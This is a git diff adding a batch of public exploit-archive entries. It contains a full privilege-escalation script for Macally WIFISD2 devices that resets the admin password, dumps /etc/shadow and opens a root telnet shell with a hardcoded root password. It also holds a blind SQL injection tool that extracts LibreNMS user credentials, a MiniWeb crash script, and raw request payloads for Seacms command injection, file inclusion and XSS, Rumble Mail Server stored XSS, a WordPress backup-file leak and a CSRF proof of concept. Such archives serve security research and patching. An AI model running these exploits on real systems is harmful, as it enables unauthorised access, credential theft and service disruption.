diff --git a/exploits/hardware/webapps/49256.py b/exploits/hardware/webapps/49256.py new file mode 100755 index 000000000..20f038900 --- /dev/null +++ b/exploits/hardware/webapps/49256.py @@ -0,0 +1,140 @@ +# Exploit Title: Macally WIFISD2-2A82 2.000.010 - Guest to Root Privilege Escalation +# Date: 03.12.2020 +# Exploit Author: Maximilian Barz and Daniel Schwendner +# Vendor Homepage: https://us.macally.com/products/wifisd2 +# Version: 2.000.010 +# Tested on: Kali Linux 5.7.0-kali1-amd64 +# CVE : CVE-2020-29669 +# Reference: https://github.com/S1lkys/CVE-2020-29669/ + +#!/usr/bin/env/python3 +import requests +import telnetlib +import os +import sys +import re + +banner = '''\033[94m + ██████ ▄▄▄█████▓ ▄▄▄ ██▀███ ▄▄▄▄ █ ██ ██▀███ ██████ ▄▄▄█████▓ +▒██ ▒ ▓ ██▒ ▓▒▒████▄ ▓██ ▒ ██▒▓█████▄ ██ ▓██▒▓██ ▒ ██▒▒██ ▒ ▓ ██▒ ▓▒ +░ ▓██▄ ▒ ▓██░ ▒░▒██ ▀█▄ ▓██ ░▄█ ▒▒██▒ ▄██▓██ ▒██░▓██ ░▄█ ▒░ ▓██▄ ▒ ▓██░ ▒░ + ▒ ██▒░ ▓██▓ ░ ░██▄▄▄▄██ ▒██▀▀█▄ ▒██░█▀ ▓▓█ ░██░▒██▀▀█▄ ▒ ██▒░ ▓██▓ ░ +▒██████▒▒ ▒██▒ ░ ▓█ ▓██▒░██▓ ▒██▒░▓█ ▀█▓▒▒█████▓ ░██▓ ▒██▒▒██████▒▒ ▒██▒ ░ +▒ ▒▓▒ ▒ ░ ▒ ░░ ▒▒ ▓▒█░░ ▒▓ ░▒▓░░▒▓███▀▒░▒▓▒ ▒ ▒ ░ ▒▓ ░▒▓░▒ ▒▓▒ ▒ ░ ▒ ░░ +░ ░▒ ░ ░ ░ ▒ ▒▒ ░ ░▒ ░ ▒░▒░▒ ░ ░░▒░ ░ ░ ░▒ ░ ▒░░ ░▒ ░ ░ ░ +░ ░ ░ ░ ░ ▒ ░░ ░ ░ ░ ░░░ ░ ░ ░░ ░ ░ ░ ░ ░ + ░ ░ ░ ░ ░ ░ ░ ░ + ░ +\x1b[0m +Macally WIFISD2 Guest to Root Privilege Escalation for CVE-2020-29669 by Maximilian Barz and Daniel Schwendner +''' +def main(): + if(len(sys.argv) < 2): + print(banner) + print("Usage: %s " % sys.argv[0]) + print("Eg: %s 1.2.3.4 " % sys.argv[0]) + return + rhost = sys.argv[1] + session = requests.Session() + guest_creds = "guest_pass" + admin_pass_to_set = "Silky123" + + def send_requests(): + url = "http://"+rhost+"/protocol.csp?function=set" + payload = {'fname':'security','opt':'pwdchk','name':'guest','pwd1':guest_creds,'function':'set'} + headers = { + 'Host': rhost, + 'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0', + 'Accept': '*/*', + 'Accept-Language': 'en-US,en;q=0.5', + 'Accept-Encoding': 'gzip, deflate', + 'Referer': 'http://'+rhost+'/index.html', + 'Content-Type': 'application/x-www-form-urlencoded', + 'Content-Length': '65', + 'Connection': 'close', + 'Cache-Control': 'no-cache', + } + + r= session.post(url, payload, headers) + if (b"0" in r.content): + print("\033[92m[+] Authentication successful\x1b[0m") + print("\t"+str(session.cookies.get_dict())) + else: + print("\033[91m[+] Authentication failed.\x1b[0m") + sys.exit() + + url = "http://"+rhost+"/protocol.csp?fname=security&function=set" + payload = {'name':'admin','opt':'pwdmod','pwd1':admin_pass_to_set,'pwd2':admin_pass_to_set} + headers = { + 'Host': rhost, + 'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0', + 'Accept': '*/*', + 'Accept-Language': 'en-US,en;q=0.5', + 'Accept-Encoding': 'gzip, deflate', + 'Referer': 'http://'+rhost+'/app/user/guest.html', + 'Content-Type': 'application/x-www-form-urlencoded', + 'Content-Length': '49', + 'Connection': 'close', + 'Cache-Control': 'no-cache', + } + d = session.post(url, payload, headers) + if (b"0" in d.content): + print("\033[92m[+] Admin Password changed to: "+admin_pass_to_set+"\x1b[0m") + telnet_grep_root_hash() + #print("[+] Spawning Admin Shell") + #telnet_login() + else: + print("\033[91m[+] Admin Password change failed\x1b[0m") + sys.exit() + + + def telnet_grep_root_hash(): + user = "admin" + tn = telnetlib.Telnet(rhost) + tn.read_until(b"login: ") + tn.write(user.encode('ascii') + b"\n") + tn.read_until(b"Password: ") + tn.write(admin_pass_to_set.encode('ascii') + b"\n") + print("\033[92m[+] Dumping Hashes:\x1b[0m") + tn.write(b"cat /etc/shadow\n\r") + tn.write(b"exit\n") + output = tn.read_all().decode('ascii') + L = output.split('\n') + for hash in L: + if ":" in hash: + print("\t"+hash) + print("\n\r") + for hash in L: + if "root" in hash: + print("\033[92m[+] Root Hash found, trying to crack it..\x1b[0m") + print("\t"+hash) #root:$1$D0o034Sm$LY0jyeFPifEXVmdgUfSEj/:15386:0:99999:7::: + f = open("root_hash","w+") + f.write(hash) + f.close() + crack_root_hash(); + + + def crack_root_hash(): + f = open("root_hash", "r") + hash = f.read() + if ("root:$1$D0o034Sm$LY0jyeFPifEXVmdgUfSEj/:15386:0:99999:7:::" in hash): + print("\033[92mRoot Password: 20080826\x1b[0m\n") + telnet_login() + else: + os.system("hashcat -a 0 -m 500 root_hash /root/tools/routersploit/routersploit/resources/wordlists/passwords.txt") #https://github.com/threat9/routersploit/blob/master/routersploit/resources/wordlists/passwords.txt + + def telnet_login(): + print("\033[92m[+] Spawning Rootshell\x1b[0m") + user = "root" + root_password="20080826" + tn = telnetlib.Telnet(rhost) + tn.read_until(b"login: ") + tn.write(user.encode('ascii') + b"\n") + tn.read_until(b"Password: ") + tn.write(root_password.encode('ascii') + b"\n") + tn.interact() + print(banner) + send_requests() + +if(__name__ == '__main__'): + main() \ No newline at end of file diff --git a/exploits/multiple/webapps/49246.py b/exploits/multiple/webapps/49246.py new file mode 100755 index 000000000..82060e3e5 --- /dev/null +++ b/exploits/multiple/webapps/49246.py @@ -0,0 +1,263 @@ +# Exploit Title: LibreNMS 1.46 - MAC Accounting Graph Authenticated SQL Injection +# Google Dork: Unknown +# Date: 13-12-2020 +# Exploit Author: Hodorsec +# Vendor Homepage: https://www.librenms.org +# Software Link: https://github.com/librenms/librenms +# Update notice: https://community.librenms.org/t/v1-69-october-2020-info/13838 +# Version: 1.46 +# Tested on: Debian 10, PHP 7, LibreNMS 1.46; although newer version might be affected until 1.69 patch +# CVE : N/A + +#!/usr/bin/python3 + +# EXAMPLE: +# $ python3 poc_librenms-1.46_auth_sqli_timed.py librenms D32fwefwef http://192.168.252.14 2 +# [*] Checking if authentication for page is required... +# [*] Visiting page to retrieve initial token and cookies... +# [*] Retrieving authenticated cookie... +# [*] Printing number of rows in table... +# 1 +# [*] Found 1 rows of data in table 'users' +# +# [*] Retrieving 1 rows of data using 'username' as column and 'users' as table... +# [*] Extracting strings from row 1... +# librenms +# [*] Retrieved value 'librenKs' for column 'username' in row 1 +# [*] Retrieving 1 rows of data using 'password' as column and 'users' as table... +# [*] Extracting strings from row 1... +# $2y$10$pAB/lLNoT8wx6IedB3Hnpu./QMBqN9MsqJUcBy7bsr +# [*] Retrieved value '$2y$10$pAB/lLNoT8wx6IedB3Hnpu./QMBqN9MsqJUcBy7bsr' for column 'password' in row 1 +# +# [+] Done! + +import requests +import urllib3 +import os +import sys +import re +from bs4 import BeautifulSoup + +# Optionally, use a proxy +# proxy = "http://:@:" +proxy = "" +os.environ['http_proxy'] = proxy +os.environ['HTTP_PROXY'] = proxy +os.environ['https_proxy'] = proxy +os.environ['HTTPS_PROXY'] = proxy + +# Disable cert warnings +urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) + +# Set timeout +timeout = 10 + +# Injection prefix and suffix +inj_prefix = "(select(sleep(" +inj_suffix = ")))))" + +# Decimal begin and end +dec_begin = 48 +dec_end = 57 + +# ASCII char begin and end +ascii_begin = 32 +ascii_end = 126 + +# Handle CTRL-C +def keyboard_interrupt(): + """Handles keyboardinterrupt exceptions""" + print("\n\n[*] User requested an interrupt, exiting...") + exit(0) + +# Custom headers +def http_headers(): + headers = { + 'User-Agent': 'Mozilla', + } + return headers + +def check_auth(url,headers): + print("[*] Checking if authentication for page is required...") + target = url + "/graph.php" + r = requests.get(target,headers=headers,timeout=timeout,verify=False) + if "Unauthorized" in r.text: + return True + else: + return False + +def get_initial_token_and_cookies(url,headers): + print("[*] Visiting page to retrieve initial token and cookies...") + target = url + "/login" + r = requests.get(target,headers=headers,timeout=timeout,verify=False) + soup = BeautifulSoup(r.text,'html.parser') + for n in soup('input'): + if n['name'] == "_token": + token = n['value'] + return token,r.cookies + else: + return None,r.cookies + +def get_valid_cookie(url,headers,token,cookies,usern,passw): + print("[*] Retrieving authenticated cookie...") + appl_cookie = "laravel_session" + post_data = {'_token':token, + 'username':usern, + 'password':passw, + 'submit':''} + target = url + "/login" + r = requests.post(target,data=post_data,headers=headers,cookies=cookies,timeout=timeout,verify=False) + res = r.text + if "Overview | LibreNMS" in res: + return r.cookies + else: + print("[!] No valid response from used session, exiting!\n") + exit(-1) + +# Perform the SQLi call for injection +def sqli(url,headers,cookies,inj_str,sleep): + comment_inj_str = re.sub(" ","/**/",inj_str) + inj_params = {'id':'1', + 'stat':'none', + 'type':'port_mac_acc_total', + 'sort':comment_inj_str, + 'debug':'1'} + inj_params_unencoded = "&".join("%s=%s" % (k,v) for k,v in inj_params.items()) + # Do GET request + r = requests.get(url,params=inj_params_unencoded,headers=headers,cookies=cookies,timeout=timeout,verify=False) + res = r.elapsed.total_seconds() + if res >= sleep: + return True + elif res < sleep: + return False + else: + print("[!] Something went wrong checking responses. Check responses manually. Exiting.") + exit(-1) + +# Extract rows +def get_rows(url,headers,cookies,table,sleep): + rows = "" + max_pos_rows = 4 + # Get number maximum positional characters of rows: e.g. 1096,2122,1234,etc. + for pos in range(1,max_pos_rows+1): + # Test if current pos does have any valid value. If not, break + direction = ">" + inj_str = inj_prefix + str(sleep) + "-(if(ORD(MID((select IFNULL(CAST(COUNT(*) AS NCHAR),0x20) FROM " + table + ")," + str(pos) + ",1))" + direction + "1,0," + str(sleep) + inj_suffix + if not sqli(url,headers,cookies,inj_str,sleep): + break + # Loop decimals + direction = "=" + for num_rows in range(dec_begin,dec_end+1): + row_char = chr(num_rows) + inj_str = inj_prefix + str(sleep) + "-(if(ORD(MID((select IFNULL(CAST(COUNT(*) AS NCHAR),0x20) FROM " + table + ")," + str(pos) + ",1))"=+ direction + str(num_rows) + ",0," + str(sleep) + inj_suffix + if sqli(url,headers,cookies,inj_str,sleep): + rows += row_char + print(row_char,end='',flush=True) + break + if rows != "": + print("\n[*] Found " + rows + " rows of data in table '" + table + "'\n") + return int(rows) + else: + return False + +# Loop through positions and characters +def get_data(url,headers,cookies,row,column,table,sleep): + extracted = "" + max_pos_len = 50 + # Loop through length of string + # Not very efficient, should use a guessing algorithm + print("[*] Extracting strings from row " + str(row+1) + "...") + for pos in range(1,max_pos_len): + # Test if current pos does have any valid value. If not, break + direction = ">" + inj_str = inj_prefix + str(sleep) + "-(if(ord(mid((select ifnull(cast(" + column + " as NCHAR),0x20) from " + table + " LIMIT " + str(row) += ",1)," + str(pos) + ",1))" + direction + str(ascii_begin) + ",0," + str(sleep) + inj_suffix + if not sqli(url,headers,cookies,inj_str,sleep): + break + # Loop through ASCII printable characters + direction = "=" + for guess in range(ascii_begin,ascii_end+1): + extracted_char = chr(guess) + inj_str = inj_prefix + str(sleep) + "-(if(ord(mid((select ifnull(cast(" + column + " as NCHAR),0x20) from " + table + " LIMIT " + str(row) + ",1)," + str(pos) + ",1))" + direction + str(guess) + ",0," + str(sleep) + inj_suffix + if sqli(url,headers,cookies,inj_str,sleep): + extracted += chr(guess) + print(extracted_char,end='',flush=True) + break + return extracted + +# Main +def main(argv): + if len(sys.argv) == 5: + usern = sys.argv[1] + passw = sys.argv[2] + url = sys.argv[3] + sleep = int(sys.argv[4]) + else: + print("[*] Usage: " + sys.argv[0] + " \n") + exit(0) + + # Random headers + headers = http_headers() + + # Do stuff + try: + # Get a valid initial token and cookies + token,cookies = get_initial_token_and_cookies(url,headers) + + # Check if authentication is required + auth_required = check_auth(url,headers) + + if auth_required: + # Get an authenticated session cookie using credentials + valid_cookies = get_valid_cookie(url,headers,token,cookies,usern,passw) + else: + valid_cookies = cookies + print("[+] Authentication not required, continue without authentication...") + + # Setting the correct vulnerable page + url = url + "/graph.php" + + # The columns to retrieve + columns = ['username','password'] + + # The table to retrieve data from + table = "users" + + # Getting rows + print("[*] Printing number of rows in table...") + rows = get_rows(url,headers,valid_cookies,table,sleep) + if not rows: + print("[!] Unable to retrieve rows, checks requests.\n") + exit(-1) + + # Getting values for found rows in specified columns + for column in columns: + print("[*] Retrieving " + str(rows) + " rows of data using '" + column + "' as column and '" + table + "' as table...") + for row in range(0,rows): + # rowval_len = get_length(url,headers,row,column,table) + retrieved = get_data(url,headers,valid_cookies,row,column,table,sleep) + print("\n[*] Retrieved value '" + retrieved + "' for column'" + column + "' in row " + str(row+1)) + # Done + print("\n[+] Done!\n") + + except requests.exceptions.Timeout: + print("[!] Timeout error\n") + exit(-1) + except requests.exceptions.TooManyRedirects: + print("[!] Too many redirects\n") + exit(-1) + except requests.exceptions.ConnectionError: + print("[!] Not able to connect to URL\n") + exit(-1) + except requests.exceptions.RequestException as e: + print("[!] " + str(e)) + exit(-1) + except requests.exceptions.HTTPError as e: + print("[!] Failed with error code - " + str(e.code) + "\n") + exit(-1) + except KeyboardInterrupt: + keyboard_interrupt() + exit(-1) + +# If we were called as a program, go execute the main function. +if __name__ == "__main__": + main(sys.argv[1:]) \ No newline at end of file diff --git a/exploits/multiple/webapps/49247.py b/exploits/multiple/webapps/49247.py new file mode 100755 index 000000000..8819ba6af --- /dev/null +++ b/exploits/multiple/webapps/49247.py @@ -0,0 +1,55 @@ +# Exploit Title: MiniWeb HTTP Server 0.8.19 - Buffer Overflow (PoC) +# Date: 13.12.2020 +# Exploit Author: securityforeveryone.com +# Author Mail: hello[AT]securityforeveryone.com +# Vendor Homepage: https://sourceforge.net/projects/miniweb/ +# Software Link: https://sourceforge.net/projects/miniweb/files/miniweb/0.8/miniweb-win32-20130309.zip/download +# Version: 0.8.19 +# Tested on: Win7 x86 +# Researchers: Security For Everyone Team - https://securityforeveryone.com + +''' +Description + + MiniWeb HTTP server 0.8.19 allows remote attackers to cause a denial of service (daemon crash) via a long name for the + first parameter in a POST request. + +Exploitation + + The vulnerability is the first parameter's name of the POST request. Example: PARAM_NAME1=param_data1¶m_name2=param_data2 + if we send a lot of "A" characters to "PARAM_NAME1", the miniweb server will crash. + +About Security For Everyone Team + +We are a team that has been working on cyber security in the industry for a long time. +In 2020, we created securityforeveyone.com where everyone can test their website security and get help to fix their vulnerabilities. +We have many free tools that you can use here: https://securityforeveryone.com/free-tool-list + +''' + +#!/usr/bin/python + +import socket +import sys +import struct + +if len(sys.argv) != 2 : + print "[+] Usage : python exploit.py [VICTIM_IP]" + exit(0) + +TCP_IP = sys.argv[1] +TCP_PORT = 8000 + +xx = "A"*2038 #4085 + +http_req = "POST /index.html HTTP/1.1\r\n" +http_req += "Host: 192.168.231.140\r\n" +http_req += "From: header-data\r\n" +http_req += "Content-Type: application/x-www-form-urlencoded\r\n\r\n" +http_req += xx + "=param_data1¶m_name2=param_data2" + +s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) +s.connect((TCP_IP, TCP_PORT)) +print "[+] Sending exploit payload..." +s.send(http_req) +s.close() \ No newline at end of file diff --git a/exploits/multiple/webapps/49249.txt b/exploits/multiple/webapps/49249.txt new file mode 100644 index 000000000..f7202209a --- /dev/null +++ b/exploits/multiple/webapps/49249.txt @@ -0,0 +1,29 @@ +# Exploit Title: Seacms 11.1 - 'ip and weburl' Remote Command Execution +# Date: 20201212 +# Exploit Author: j5s +# Vendor Homepage: https://www.seacms.net/ +# Software Link: https://www.seacms.net/ +# Version: 11.1 + +POST /SeaCMS111/5f9js3/admin_ip.php?action=set HTTP/1.1 +Host: 192.168.137.139 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:83.0) Gecko/20100101 Firefox/83.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 +Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 +Accept-Encoding: gzip, deflate +Content-Type: application/x-www-form-urlencoded +Content-Length: 36 +Origin: http://192.168.137.139 +Connection: close +Referer: http://192.168.137.139/SeaCMS111/5f9js3/admin_ip.php +Cookie: more=1; Hm_lvt_22c4c422b3e7b17729ce8b5817d54592=1607175396; +PHPSESSID=t1gc019b35rrgmr1dg53gfje96; +t00ls=e54285de394c4207cd521213cebab040; +t00ls_s=YTozOntzOjQ6InVzZXIiO3M6MzoicGhwIjtzOjM6ImFsbCI7aTowO3M6MzoiaHRhIjtpOjE7fQ%3D%3D +Upgrade-Insecure-Requests: 1 + +v=0&ip=+%22%3Bphpinfo%28%29%3B%2F%2F + +Vulnerable parameters:ip + +payload:";phpinfo();// \ No newline at end of file diff --git a/exploits/multiple/webapps/49250.txt b/exploits/multiple/webapps/49250.txt new file mode 100644 index 000000000..acedb7419 --- /dev/null +++ b/exploits/multiple/webapps/49250.txt @@ -0,0 +1,24 @@ +# Exploit Title: Seacms 11.1 - 'file' Local File Inclusion +# Date: 20201212 +# Exploit Author: j5s +# Vendor Homepage: https://www.seacms.net/ +# Software Link: https://www.seacms.net/ +# Version: 11.1 + +GET /SEACMS111/5f9js3/admin_safe.php?action=download&file=C:/windows/system.ini HTTP/1.1 +Host: 192.168.137.139 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:83.0) Gecko/20100101 Firefox/83.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 +Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 +Accept-Encoding: gzip, deflate +Connection: close +Referer: http://192.168.137.139/SEACMS111/5f9js3/admin_safe.php?action=scan +Cookie: more=1; Hm_lvt_22c4c422b3e7b17729ce8b5817d54592=1607175396; +PHPSESSID=t1gc019b35rrgmr1dg53gfje96; +t00ls=e54285de394c4207cd521213cebab040; +t00ls_s=YTozOntzOjQ6InVzZXIiO3M6MzoicGhwIjtzOjM6ImFsbCI7aTowO3M6MzoiaHRhIjtpOjE7fQ%3D%3D +Upgrade-Insecure-Requests: 1 + +Vulnerable parameters: file + +payload:C:/windows/system.ini \ No newline at end of file diff --git a/exploits/multiple/webapps/49251.txt b/exploits/multiple/webapps/49251.txt new file mode 100644 index 000000000..fec335073 --- /dev/null +++ b/exploits/multiple/webapps/49251.txt @@ -0,0 +1,30 @@ +# Exploit Title: Seacms 11.1 - 'checkuser' Stored XSS +# Date: 20201212 +# Exploit Author: j5s +# Vendor Homepage: https://www.seacms.net/ +# Software Link: https://www.seacms.net/ +# Version: 11.1 + +POST /SEACMS111/5f9js3/admin_safe.php?action=setting HTTP/1.1 +Host: 192.168.137.139 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:83.0) +Gecko/20100101 Firefox/83.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 +Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 +Accept-Encoding: gzip, deflate +Content-Type: application/x-www-form-urlencoded +Content-Length: 97 +Origin: http://192.168.137.139 +Connection: close +Referer: http://192.168.137.139/SEACMS111/5f9js3/admin_safe.php?action=setting +Cookie: more=1; Hm_lvt_22c4c422b3e7b17729ce8b5817d54592=1607175396; +PHPSESSID=t1gc019b35rrgmr1dg53gfje96; +t00ls=e54285de394c4207cd521213cebab040; +t00ls_s=YTozOntzOjQ6InVzZXIiO3M6MDoiIjtzOjM6ImFsbCI7aTowO3M6MzoiaHRhIjtpOjE7fQ%3D%3D +Upgrade-Insecure-Requests: 1 + +checkuser=%22%3E%3CsCrIpT%3Ealert%281%29%3C%2FsCrIpT%3E&checkhta=on&btnsetting=%E6%8F%90%E4%BA%A4 + +Vulnerable parameters: checkuser + +payload:"> \ No newline at end of file diff --git a/exploits/multiple/webapps/49252.txt b/exploits/multiple/webapps/49252.txt new file mode 100644 index 000000000..2bdfffc61 --- /dev/null +++ b/exploits/multiple/webapps/49252.txt @@ -0,0 +1,36 @@ +# Exploit Title: WordPress Plugin Total Upkeep 1.14.9 - Database and Files Backup Download +# Google Dork: intitle:("Index of" AND "wp-content/plugins/boldgrid-backup/=") +# Date: 2020-12-12 +# Exploit Author: Wadeek +# Vendor Homepage: https://www.boldgrid.com/ +# Software Link: https://downloads.wordpress.org/plugin/boldgrid-backup.1.14.9.zip +# Version: 1.14.9 +# Tested on: BackBox Linux + +1) 'readme.txt' file reveal the plugin version : +-> GET /wp-content/plugins/boldgrid-backup/readme.txt +Stable tag: 1.14.9 + +2) 'env-info.php' file reveals the following informations without authentication : +-> GET /wp-content/plugins/boldgrid-backup/cli/env-info.php +{ + [...], + "php_uname":"Linux wordpress-server X.X.X-XX-generic #XX-Ubuntu [...] x= +86_64", + "php_version":"7.X.X", + "server_addr":"127.0.0.1", + "server_name":"www.example.com", + "server_protocol":"HTTP/1.1", + "server_software":"Apache/2.X.XX (Ubuntu)", + "uid":XX, + "username":"www-data" +} + +3) 'restore-info.json' file reveals the name and location of the archive containing the backups without authentication : +-> GET /wp-content/plugins/boldgrid-backup/cron/restore-info.json +{ + [...] + "filepath":"/wp-content/boldgrid_backup_[RANDOM]/boldgrid-backup-www.example.com_wordpress-[RANDOM]-[DATE]-XXXXXX.zip" + [...] +} +--trekuen-71b82944-04b2-40f7-b2e2-d8de1b7f2bb8-- \ No newline at end of file diff --git a/exploits/multiple/webapps/49253.txt b/exploits/multiple/webapps/49253.txt new file mode 100644 index 000000000..a2bbed8f8 --- /dev/null +++ b/exploits/multiple/webapps/49253.txt @@ -0,0 +1,75 @@ +# Exploit Title: Rumble Mail Server 0.51.3135 - 'servername' Stored XSS +# Date: 2020-9-3 +# Exploit Author: Mohammed Alshehri +# Vendor Homepage: http://rumble.sf.net/ +# Software Link: https://sourceforge.net/projects/rumble/files/Windows%20binaries/rumble_0.51.3135-setup.exe +# Version: Version 0.51.3135 +# Tested on: Microsoft Windows 10 Education - 10.0.17763 N/A Build 17763 + +# Exploit: +POST /settings:save HTTP/1.1 +Host: 127.0.0.1:2580 +Connection: keep-alive +Content-Length: 343 +Cache-Control: max-age=0 +Authorization: Basic YWRtaW46YWRtaW4= +Upgrade-Insecure-Requests: 1 +Origin: http://127.0.0.1:2580 +Content-Type: application/x-www-form-urlencoded +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.57 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 +Sec-Fetch-Site: same-origin +Sec-Fetch-Mode: navigate +Sec-Fetch-User: ?1 +Sec-Fetch-Dest: document +Referer: http://127.0.0.1:2580/settings +Accept-Encoding: gzip, deflate, br +Accept-Language: en-US,en;q=0.9 + +save=true&runas=root&servername=%3Cscript%3Ealert%28%22xss.com%22%29%3C%2Fscript%3E&forceipv4=1&bindtoaddress=0.0.0.0&messagesizelimit=104857600&mailpath=C%3A%2FProgram+Files%2FRumble%2Fstorage&dbpath=db&radio=sqlite3&smtp=1&smtpport=25&pop3=1&pop3port=110&imap4=1&imap4port=143&deliveryattempts=5&retryinterval=360&Save+settings=Save+settings +HTTP/1.1 302 Moved +Location: /settings:save + +HTTP/1.1 200 OK +Connection: close +Content-Type: text/html + + + + + + +RumbleLua + + + +
+
+ RumbleLua on
+ Rumble Mail Server v/0.51.3135
+
+ + Server status + Domains & accounts + + RumbleLua users + Server settings + Set up modules + System logs + Mail queue + +
+
+
+

Server settings

+ +Saving config/rumble.conf +
+
+

+Powered by Rumble Mail Server - [wiki] [project home] +

+ + + + \ No newline at end of file diff --git a/exploits/multiple/webapps/49254.txt b/exploits/multiple/webapps/49254.txt new file mode 100644 index 000000000..c94a10cea --- /dev/null +++ b/exploits/multiple/webapps/49254.txt @@ -0,0 +1,105 @@ +# Exploit Title: Rumble Mail Server 0.51.3135 - 'domain and path' Stored XSS +# Date: 2020-9-3 +# Exploit Author: Mohammed Alshehri +# Vendor Homepage: http://rumble.sf.net/ +# Software Link: https://sourceforge.net/projects/rumble/files/Windows%20binaries/rumble_0.51.3135-setup.exe +# Version: Version 0.51.3135 +# Tested on: Microsoft Windows 10 Education - 10.0.17763 N/A Build 17763 + +# Info +The parameters `domain` and `path` are vulnerable to stored XSS. + +# Exploit: +POST /domains HTTP/1.1 +Host: 127.0.0.1:2580 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Content-Type: application/x-www-form-urlencoded +Content-Length: 119 +Origin: http://127.0.0.1:2580 +Authorization: Basic YWRtaW46YWRtaW4= +Connection: keep-alive +Referer: http://127.0.0.1:2580/domains?domain=%3Cscript%3Ealert( +Upgrade-Insecure-Requests: 1 + +domain=%3Cscript%3Ealert%28%22XSS%22%29%3C%2Fscript%3E&path=%3Cscript%3Ealert%28%22XSS%22%29%3C%2Fscript%3E&create=true +HTTP/1.1 200 OK +Connection: close +Content-Type: text/html + + + + + + +RumbleLua + + + +
+
+ RumbleLua on a
+ Rumble Mail Server v/0.51.3135
+
+ + Server status + Domains & accounts + + RumbleLua users + Server settings + Set up modules + System logs + Mail queue + +
+
+
+

Domains

+

+
Create a new domain
Domain has been created.
+
+
+
+ Domain name: +
+
+ +
+
+ +
+
+ Optional alt. storage path: +
+
+ +
+
+ + +
+
+ + + +
+
+




+
+
+

+

 

+ + +
DomainActions
 "> &delete=true">
+
+
+

+Powered by Rumble Mail Server - [wiki] [project home] +

+ + + + \ No newline at end of file diff --git a/exploits/multiple/webapps/49255.txt b/exploits/multiple/webapps/49255.txt new file mode 100644 index 000000000..50b5847d1 --- /dev/null +++ b/exploits/multiple/webapps/49255.txt @@ -0,0 +1,146 @@ +# Exploit Title: Rumble Mail Server 0.51.3135 - 'username' Stored XSS +# Date: 2020-9-3 +# Exploit Author: Mohammed Alshehri +# Vendor Homepage: http://rumble.sf.net/ +# Software Link: https://sourceforge.net/projects/rumble/files/Windows%20binaries/rumble_0.51.3135-setup.exe +# Version: Version 0.51.3135 +# Tested on: Microsoft Windows 10 Education - 10.0.17763 N/A Build 17763 + +# Exploit: +POST /users HTTP/1.1 +Host: 127.0.0.1:2580 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Content-Type: application/x-www-form-urlencoded +Content-Length: 96 +Origin: http://127.0.0.1:2580 +Authorization: Basic YWRtaW46YWRtaW4= +Connection: keep-alive +Referer: http://127.0.0.1:2580/users +Upgrade-Insecure-Requests: 1 + +username=%3Cscript%3Ealert%28%22M507%22%29%3C%2Fscript%3E&password=admin&rights=*&submit=Submit +HTTP/1.1 200 OK +Connection: close +Content-Type: text/html + + + + + + +RumbleLua + + + +
+
+ RumbleLua on a.com
+ Rumble Mail Server v/0.51.3135
+
+ + Server status + Domains & accounts + + RumbleLua users + Server settings + Set up modules + System logs + Mail queue + +
+
+
+ + +

RumbleLua users

+

This page allows you to create, modify or delete accounts on the RumbleLua system.
+Users with lock Full control can add, edit and delete domains as well as change server settings,
+while regular users can only +see and edit the domains they have access to. +

+ + + + + + + +
Create a new user:
+
+ +
+ + +
+ + +
+ + +
+



+
+
+
+
+
+
+
+
+ +    + +

+ +
+
+ + + + + + + + + + + + + + + + + + + + + +
UsernameRightsActions
 Full control + &edit=true">  + &delete=true"> +
 adminFull control +   + +
 Full control + &edit=true">  + &delete=true"> +
+

 

+ + +
+
+

+Powered by Rumble Mail Server - [wiki] [project home] +

+ + + + \ No newline at end of file diff --git a/exploits/php/webapps/49245.txt b/exploits/php/webapps/49245.txt new file mode 100644 index 000000000..b67419f9e --- /dev/null +++ b/exploits/php/webapps/49245.txt @@ -0,0 +1,30 @@ +# Exploit Title: Rukovoditel 2.6.1 - Cross-Site Request Forgery (Change +password) +# Date: 2020-12-14 +# Exploit Author: KeopssGroup0day,Inc +# Vendor Homepage: https://www.rukovoditel.net/ +# Software Link: https://www.rukovoditel.net/download.php +# Version: v2.6.1 +# Tested on: Kali Linux + +POC(localhost/index.php?module=users/change_password): + + + + + +
+ + + + +
